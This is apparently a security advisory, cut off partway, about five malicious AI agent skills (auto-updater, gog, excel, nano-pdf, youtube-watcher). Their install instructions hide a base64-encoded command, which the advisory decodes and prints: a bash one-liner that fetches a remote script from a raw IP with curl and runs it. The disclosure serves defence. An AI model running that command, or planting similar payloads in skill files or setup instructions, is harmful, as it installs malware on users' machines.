🚨 Malware Found in AI Agent Skills: A Security Advisory

We recently discovered malware hiding in plain sight within AI agent skill files on GitHub. This post details the attack, how we caught it, and what to do if you're affected. What Happened During routine AI-powered security reviews on SkillHub — an open-source marketplace for AI agent skills — our automated review pipeline flagged 5 skills from the openclaw/skills GitHub repository as malicious. These skills disguise themselves as useful tools: Skill Claimed Purpose Downloads auto-updater Auto-update installed skills 443 gog Google Workspace CLI 176 excel Excel file handling 149 nano-pdf PDF editing 133 youtube-watcher YouTube transcripts 115 Total affected downloads: ~1,016 The Attack All five skills follow the same pattern: Present as a legitimate, useful tool Require installing "OpenClawProvider" as a dependency The installation instructions contain a base64-encoded command On macOS, the encoded payload decodes to: ​/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)" T